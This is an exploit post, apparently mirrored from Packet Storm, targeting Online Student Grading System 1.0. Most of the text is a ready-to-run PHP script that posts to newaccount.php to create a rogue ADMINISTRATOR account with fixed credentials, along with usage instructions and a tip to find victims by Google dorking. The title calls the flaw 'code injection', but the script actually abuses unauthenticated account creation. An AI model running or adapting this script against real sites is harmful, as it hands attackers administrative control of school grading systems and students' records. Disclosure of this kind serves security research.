Share
## https://sploitus.com/exploit?id=PACKETSTORM:181560
=============================================================================================================================================  
| # Title : Online Student Grading System 1.0 php code injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |  
| # Vendor : https://www.campcodes.com/projects/php/online-student-grading-system/ |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking ฤฐn Google Or Other Search Enggine.  
  
[+] This payload inject New Admin account.   
  
'user' => 'indoushka',  
'pwd' => 'hacked',  
  
[+] save payload as poc.php  
  
[+] usage from cmd : C:\www\test>php 1.php target.com  
  
[+] payload :  
  
<?php  
  
function add_admin_user($website) {  
  
$post_fields = array(  
'page' => '',  
'fname' => 'nekkaa',  
'lname' => 'salah eddine',  
'user' => 'indoushka',  
'pwd' => 'hacked',  
'type' => 'ADMINISTRATOR',  
  
'qty' => '1'  
);  
  
$ch = curl_init();  
curl_setopt($ch, CURLOPT_URL, "$website/newaccount.php");  
curl_setopt($ch, CURLOPT_POST, 1);  
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
  
$response = curl_exec($ch);  
curl_close($ch);  
  
echo "(+) Admin Add Successfully...\n";  
}  
  
if ($argc != 2) {  
echo "(+) Usage: php " . $argv[0] . " <website URL>\n";  
echo "(+) Example: php " . $argv[0] . " http://example.com\n";  
exit(-1);  
}  
  
$website = $argv[1];  
add_admin_user($website);  
  
  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================